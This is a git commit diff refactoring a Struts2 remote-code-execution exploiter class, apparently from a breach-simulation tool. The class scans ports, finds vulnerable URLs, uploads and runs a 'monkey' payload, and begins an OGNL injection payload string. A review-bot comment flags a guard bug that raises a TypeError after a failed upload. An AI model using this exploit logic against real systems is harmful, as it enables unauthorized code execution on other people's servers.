Struts2 refactored for framework fixes

Vakaris 2018-08-10 15:04:23 +03:00
parent bbd4adf2ae
commit 6cb058eb1d
1 changed files with 11 additions and 15 deletions


@ -26,45 +26,39 @@ class Struts2Exploiter(WebRCE):
super(Struts2Exploiter, self).__init__(host)
def exploit_host(self):
# We need a reference to the exploiter for WebRCE framework to use
exploiter = self.exploit
# Get open ports
ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"])
ports = self.get_ports_w(self.HTTP, ["http"])
if not ports:
return False
# Get urls to try to exploit
urls = WebRCE.build_potential_urls(self.host, ports)
urls = self.build_potential_urls(ports)
vulnerable_urls = []
for url in urls:
# Get full URL
url = self.get_redirected(url)
if WebRCE.check_if_exploitable(exploiter, url):
if self.check_if_exploitable(url):
vulnerable_urls.append(url)
self._exploit_info['vulnerable_urls'] = vulnerable_urls
if not vulnerable_urls:
return False
# We need to escape backslashes for our exploiter
config = copy.deepcopy(self._config)
config.dropper_target_path_win_32 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_32)
config.dropper_target_path_win_64 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_64)
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
return True
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
if not self.set_host_arch(vulnerable_urls[0]):
return False
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0])
data = self.upload_monkey(vulnerable_urls[0])
# We can't use 'if not' because response may be ''
if data is not False and data['response'] == False:
if data is not False and data['response'] is False:
return False
if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False:
if self.change_permissions(vulnerable_urls[0], data['path']) is False:
return False
if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False:
if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
return False
return True
@ -86,6 +80,8 @@ class Struts2Exploiter(WebRCE):
:param cmd: Code to try and execute on host
:return: response
"""
cmd = re.sub(r"\\", r"\\\\", cmd)
cmd = re.sub(r"'", r"\\'", cmd)
payload = "%%{(#_='multipart/form-data')." \
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
"(#_memberAccess?" \
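Review bot: In `exploit_host`, the new guard `if data is not False and data['response'] is False:` lets a failed upload fall through. When `data` is `False` the condition is false, so the next statement evaluates `data['path']` on a bool and raises `TypeError` instead of returning `False`. The guard itself implies `upload_monkey` can return `False`, although its definition is not visible on this page, so confirm the contract; if it can, the check should read `if data is False or data['response'] is False:`. The new `is False` comparisons on `change_permissions` and `execute_remote_monkey` also treat any return other than the literal `False` (for example `None`) as success, so those helpers' return contracts should be documented in their docstrings.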